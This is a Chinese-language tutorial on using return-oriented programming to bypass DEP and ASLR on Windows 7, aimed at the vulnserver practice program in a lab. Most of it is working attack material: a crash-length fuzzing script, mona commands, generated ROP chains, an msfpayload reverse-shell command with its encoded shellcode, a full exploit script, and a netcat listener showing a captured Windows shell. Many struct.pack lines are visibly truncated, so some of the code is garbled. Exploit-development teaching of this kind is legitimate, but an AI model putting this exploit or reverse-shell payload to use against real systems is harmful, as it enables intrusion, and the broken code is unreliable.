【网络安全】Rop绕过DEP和ASRL流程实例介绍
本文主要介绍带DEP防护和ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。
1、工具软件
ImmunityDebugger1.85
mona 插件
python 2.7.1
vulnserver
win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154
kali1.0虚拟机执行攻击脚本,ip 192.168.254.155
打包下载地址:http://download.csdn.net/detail/jiayanhui2877/9111687
查看是否开启了全防护wmic OS Get DataExecutionPrevention_SupportPolicy
如果返回值不是3请自行设置DEP全防护
2、流程方法
使用如下脚本测试vulnserver在接收多少数据后崩溃,通过测试发现在2006字节后崩溃,说明函数ret时,eip执行到此地址处为非法地址程序崩溃,所以制作exploit时,在2006字节后应该为rop_chains,之后为shellcode.
#!/usr/bin/python
import socket
server = '192.168.254.154'
sport = 9999
#length = int(raw_input('length of attack: '))
prefix = 'A' * 1000
chars = ''
for i in range(0x30,0x35):
for j in range(0x30,0x3A):
for k in range(0x30,0x3A):
chars += chr(i) + chr(j) + chr(k) + 'A'
print chars,"\r\n"
attack = prefix + chars
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect((server,sport))
print s.recv(1024)
print "Sending attack to trun . with lenght ", len(attack)
s.send(('TRUN .'+ attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
s.close()
3、生成rop链
详细命令如下:
!mona -h //查看帮助
!mona modules //查看模块信息包括哪些模块使用了ASLR
!mona jmp -r esp -m essfunc.dll //查找jmp esp
//jmp esp \xFF\xE4
!mona asm -s jmp esp //将jmp esp转为汇编码
!mona find -s "\xFF\xE4" -m essfunc.dll //搜索汇编码
!mona rop -m *.dll -cp nonull //生成rop链
*** [ Python ] ***
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = ""
rop_gadgets += struct.pack(',0x00000000) # [-] Unable to find gadgets to pickup the desired API pointer into esi
rop_gadgets += struct.pack(',0x00000000) # [-] Unable to find ptr to &VirtualAlloc()
rop_gadgets += struct.pack(',0x00402a25) # POP EBP # RETN [vulnserver.exe]
rop_gadgets += struct.pack(',0x625011af) # & jmp esp [essfunc.dll]
rop_gadgets += struct.pack(',0x625011d8) # POP EBX # RETN [essfunc.dll]
rop_gadgets += struct.pack(',0x00000001) # 0x00000001-> ebx
rop_gadgets += struct.pack(',0x625011fc) # POP EDX # RETN [essfunc.dll]
rop_gadgets += struct.pack(',0x00001000) # 0x00001000-> edx
rop_gadgets += struct.pack(',0x6250120c) # POP ECX # RETN [essfunc.dll]
rop_gadgets += struct.pack(',0x00000040) # 0x00000040-> ecx
rop_gadgets += struct.pack(',0x6250195e) # POP EDI # POP EBP # RETN [essfunc.dll]
rop_gadgets += struct.pack(',0x6250172c) # RETN (ROP NOP) [essfunc.dll]
rop_gadgets += struct.pack(',0x41414141) # Filler (compensate)
rop_gadgets += struct.pack(',0x625011b4) # POP EAX # RETN [essfunc.dll]
rop_gadgets += struct.pack(',0x90909090) # nop
rop_gadgets += struct.pack(',0x00000000) # [-] Unable to find pushad gadget
return rop_gadgets
rop_chain = create_rop_chain() 4、生成shellcode
msfpayload windows/shell_reverse_tcp LHOST="192.168.254.155" LPORT=443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -b '\x00'
输出:
"\xba\x09\x69\x6c\x3e\xdd\xc5\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x52\x31\x50\x12\x03\x50\x12\x83\xe1\x95\x8e\xcb\x0d" +
"\x8d\xcd\x34\xed\x4e\xb2\xbd\x08\x7f\xf2\xda\x59\xd0\xc2" +
"\xa9\x0f\xdd\xa9\xfc\xbb\x56\xdf\x28\xcc\xdf\x6a\x0f\xe3" +
"\xe0\xc7\x73\x62\x63\x1a\xa0\x44\x5a\xd5\xb5\x85\x9b\x08" +
"\x37\xd7\x74\x46\xea\xc7\xf1\x12\x37\x6c\x49\xb2\x3f\x91" +
"\x1a\xb5\x6e\x04\x10\xec\xb0\xa7\xf5\x84\xf8\xbf\x1a\xa0" +
"\xb3\x34\xe8\x5e\x42\x9c\x20\x9e\xe9\xe1\x8c\x6d\xf3\x26" +
"\x2a\x8e\x86\x5e\x48\x33\x91\xa5\x32\xef\x14\x3d\x94\x64" +
"\x8e\x99\x24\xa8\x49\x6a\x2a\x05\x1d\x34\x2f\x98\xf2\x4f" +
"\x4b\x11\xf5\x9f\xdd\x61\xd2\x3b\x85\x32\x7b\x1a\x63\x94" +
"\x84\x7c\xcc\x49\x21\xf7\xe1\x9e\x58\x5a\x6e\x52\x51\x64" +
"\x6e\xfc\xe2\x17\x5c\xa3\x58\xbf\xec\x2c\x47\x38\x12\x07" +
"\x3f\xd6\xed\xa8\x40\xff\x29\xfc\x10\x97\x98\x7d\xfb\x67" +
"\x24\xa8\xac\x37\x8a\x03\x0d\xe7\x6a\xf4\xe5\xed\x64\x2b" +
"\x15\x0e\xaf\x44\xbc\xf5\x38\xab\xe9\x0b\x23\x43\xe8\xf3" +
"\x55\x2f\x65\x15\x3f\x5f\x20\x8e\xa8\xc6\x69\x44\x48\x06" +
"\xa4\x21\x4a\x8c\x4b\xd6\x05\x65\x21\xc4\xf2\x85\x7c\xb6" +
"\x55\x99\xaa\xde\x3a\x08\x31\x1e\x34\x31\xee\x49\x11\x87" +
"\xe7\x1f\x8f\xbe\x51\x3d\x52\x26\x99\x85\x89\x9b\x24\x04" +
"\x5f\xa7\x02\x16\x99\x28\x0f\x42\x75\x7f\xd9\x3c\x33\x29" +
"\xab\x96\xed\x86\x65\x7e\x6b\xe5\xb5\xf8\x74\x20\x40\xe4" +
"\xc5\x9d\x15\x1b\xe9\x49\x92\x64\x17\xea\x5d\xbf\x93\x0a" +
"\xbc\x15\xee\xa2\x19\xfc\x53\xaf\x99\x2b\x97\xd6\x19\xd9" +
"\x68\x2d\x01\xa8\x6d\x69\x85\x41\x1c\xe2\x60\x65\xb3\x03" +
"\xa1"
5、重新编写exploit
#!/usr/bin/python
import socket
import struct
server = '192.168.254.154'
sport = 9999
#length = int(raw_input('length of attack: '))
prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
exploit = (
"\xba\x09\x69\x6c\x3e\xdd\xc5\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x52\x31\x50\x12\x03\x50\x12\x83\xe1\x95\x8e\xcb\x0d" +
"\x8d\xcd\x34\xed\x4e\xb2\xbd\x08\x7f\xf2\xda\x59\xd0\xc2" +
"\xa9\x0f\xdd\xa9\xfc\xbb\x56\xdf\x28\xcc\xdf\x6a\x0f\xe3" +
"\xe0\xc7\x73\x62\x63\x1a\xa0\x44\x5a\xd5\xb5\x85\x9b\x08" +
"\x37\xd7\x74\x46\xea\xc7\xf1\x12\x37\x6c\x49\xb2\x3f\x91" +
"\x1a\xb5\x6e\x04\x10\xec\xb0\xa7\xf5\x84\xf8\xbf\x1a\xa0" +
"\xb3\x34\xe8\x5e\x42\x9c\x20\x9e\xe9\xe1\x8c\x6d\xf3\x26" +
"\x2a\x8e\x86\x5e\x48\x33\x91\xa5\x32\xef\x14\x3d\x94\x64" +
"\x8e\x99\x24\xa8\x49\x6a\x2a\x05\x1d\x34\x2f\x98\xf2\x4f" +
"\x4b\x11\xf5\x9f\xdd\x61\xd2\x3b\x85\x32\x7b\x1a\x63\x94" +
"\x84\x7c\xcc\x49\x21\xf7\xe1\x9e\x58\x5a\x6e\x52\x51\x64" +
"\x6e\xfc\xe2\x17\x5c\xa3\x58\xbf\xec\x2c\x47\x38\x12\x07" +
"\x3f\xd6\xed\xa8\x40\xff\x29\xfc\x10\x97\x98\x7d\xfb\x67" +
"\x24\xa8\xac\x37\x8a\x03\x0d\xe7\x6a\xf4\xe5\xed\x64\x2b" +
"\x15\x0e\xaf\x44\xbc\xf5\x38\xab\xe9\x0b\x23\x43\xe8\xf3" +
"\x55\x2f\x65\x15\x3f\x5f\x20\x8e\xa8\xc6\x69\x44\x48\x06" +
"\xa4\x21\x4a\x8c\x4b\xd6\x05\x65\x21\xc4\xf2\x85\x7c\xb6" +
"\x55\x99\xaa\xde\x3a\x08\x31\x1e\x34\x31\xee\x49\x11\x87" +
"\xe7\x1f\x8f\xbe\x51\x3d\x52\x26\x99\x85\x89\x9b\x24\x04" +
"\x5f\xa7\x02\x16\x99\x28\x0f\x42\x75\x7f\xd9\x3c\x33\x29" +
"\xab\x96\xed\x86\x65\x7e\x6b\xe5\xb5\xf8\x74\x20\x40\xe4" +
"\xc5\x9d\x15\x1b\xe9\x49\x92\x64\x17\xea\x5d\xbf\x93\x0a" +
"\xbc\x15\xee\xa2\x19\xfc\x53\xaf\x99\x2b\x97\xd6\x19\xd9" +
"\x68\x2d\x01\xa8\x6d\x69\x85\x41\x1c\xe2\x60\x65\xb3\x03" +
"\xa1"
)
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = ""
rop_gadgets += struct.pack('# POP ECX # RETN [RPCRT4.dll]
rop_gadgets += struct.pack('# ptr to &VirtualProtect() [IAT essfunc.dll]
rop_gadgets += struct.pack('# MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll]
rop_gadgets += struct.pack('# POP EBP # RETN [msvcrt.dll]
rop_gadgets += struct.pack('# & jmp esp [NSI.dll]
rop_gadgets += struct.pack('# POP EAX # RETN [msvcrt.dll]
rop_gadgets += struct.pack('# Value to negate, will become 0x00000201
rop_gadgets += struct.pack('# NEG EAX # RETN [RPCRT4.dll]
rop_gadgets += struct.pack('# XCHG EAX,EBX # RETN [MSCTF.dll]
rop_gadgets += struct.pack('# POP EAX # RETN [RPCRT4.dll]
rop_gadgets += struct.pack('# Value to negate, will become 0x00000040
rop_gadgets += struct.pack('# NEG EAX # RETN [RPCRT4.dll]
rop_gadgets += struct.pack('# XCHG EAX,EDX # RETN [KERNELBASE.dll]
rop_gadgets += struct.pack('# POP ECX # RETN [msvcrt.dll]
rop_gadgets += struct.pack('# &Writable location [user32.dll]
rop_gadgets += struct.pack('# POP EDI # RETN [RPCRT4.dll]
rop_gadgets += struct.pack('# RETN (ROP NOP) [RPCRT4.dll]
rop_gadgets += struct.pack('# POP EAX # RETN [kernel32.dll]
rop_gadgets += struct.pack('# nop
rop_gadgets += struct.pack('# PUSHAD # RETN [msvcrt.dll]
return rop_gadgets
rop_chain = create_rop_chain()
#attack = prefix + eip + nopsled + exploit
attack = prefix + rop_chain + nopsled + exploit
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect((server,sport))
print s.recv(1024)
print "Sending attack to trun . with lenght ", len(attack)
s.send(('TRUN .'+ attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
s.close()
6、kail开启监听
nc -nlvp 443
执行5中的脚本后,可以看到反连到kali的信息,此后可以对windows进行一些详细操作,反连的shellcode也可以用metepreter,这样后续操作功能更加强大,本文不做详细介绍。
root@kali:/home# nc -nlvp 443
listening on [any] 443 …
connect to [192.168.254.155] from (UNKNOWN) [192.168.254.154] 50121
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ�
C:\cracktools\vulnserver>